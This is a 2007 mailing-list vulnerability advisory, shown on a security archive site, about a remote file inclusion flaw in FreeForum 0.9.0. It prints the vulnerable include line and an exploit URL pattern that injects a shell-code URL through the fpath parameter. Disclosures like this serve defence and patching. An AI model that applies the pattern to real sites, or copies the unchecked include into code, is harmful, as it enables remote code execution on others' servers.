Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:me you <r.5.7_(at)_hotmail.com>
Date:24 января 2007 г.
Subject:FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%

FreeForum 0.9.0 <=- (index.php fpath) Remote File Include Vulnerability

Script: FreeForum

Version: 0.9.0

URL: http://www.phpfreaks.com/scripts.php?action=gotoDownload&script_id=616

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%

Bug in : index.php

code :
include("$fpath/forum.php");

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%

Explo!T :.
^^^^^
/index.php?fpath=[SHe1L-CoDe]

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%

GreeTz To :.

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  ThE-LoRd-Of-CrAcKiNg  ,  SHiKaA
 ,  str0ke

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%

_________________________________________________________________
The MSN Entertainment Guide to Golden Globes is here.  Get all the scoop.
http://tv.msn.com/tv/globes2007/?icid=nctagline2

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород